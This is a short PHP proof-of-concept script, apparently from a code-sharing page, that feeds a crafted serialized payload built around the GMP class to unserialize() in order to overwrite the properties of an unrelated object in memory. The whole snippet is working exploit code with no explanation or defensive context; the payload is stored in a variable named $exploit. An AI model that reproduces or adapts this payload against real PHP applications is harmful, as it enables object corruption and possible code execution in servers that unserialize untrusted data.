<?php class obj { var $test; function __wakeup() { $this->test = 1; } } $obj = new stdClass;// $obj handle = 1 $obj->var1 = 1; $obj->var2 = 2; $inner = 's:4:"1337";a:3:{s:4:"var1";s:6:"change";s:4:"var2";s:4:"this";i:0;O:3:"obj":1:{s:4:"test";R:2;}}'; $exploit = 'a:1:{i:0;C:3:"GMP":'.strlen($inner).':{'.$inner.'}}'; $x = unserialize($exploit);// $x handle = 2 var_dump($obj);
You have javascript disabled. You will not be able to edit any code.